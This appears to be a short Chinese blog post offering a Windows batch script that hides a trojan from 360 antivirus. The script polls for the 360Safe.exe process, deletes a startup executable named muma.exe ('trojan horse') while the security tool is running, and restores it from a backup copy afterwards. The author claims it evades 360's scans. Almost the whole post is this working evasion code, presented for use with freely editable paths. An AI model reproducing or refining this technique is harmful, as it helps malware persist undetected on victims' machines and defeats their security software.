原理就是监控360Safe.exe,如果发现进程中出现360Safe.exe,,表明360主界面已经启动。此时就删除启动项。当360Safe.exe不再了,则复制一份回来。
经测试,这样可以过360体检和360云查杀。
源代码如下:
路径请随意修改
======================================================================
@echo off :
:star
Rem 10秒钟检查一次
ping 127.1 -n 10 >nul 2>nul
Rem 进程中查找是否有360Safe.exe进程
tasklist|findstr /i "360Safe.exe"
Rem 如果没有360Safe.exe进程继续跳转到star处继续监控,如果有360Safe.exe则跳转到del处删除
if errorlevel 1 (goto star) else (goto del)
Rem 删除自启动
:del
del "C:\Program Files\muma.exe"
Rem 继续监控360Safe.exe进程
:findagain
ping 127.1 -n 20 >nul 2>nul
tasklist|findstr /i "360Safe.exe"
Rem 如果360Safe.exe不在了,则跳到not处复制启动项回来,如果还在继续跳到findagain继续查找
if errorlevel 1 (goto not) else (goto findagain)
:not
copy /n "C:\Program Files\beifen.exe" "C:\Program Files\muma.exe"
goto star
喜欢 
顶
难过
囧
围观
无聊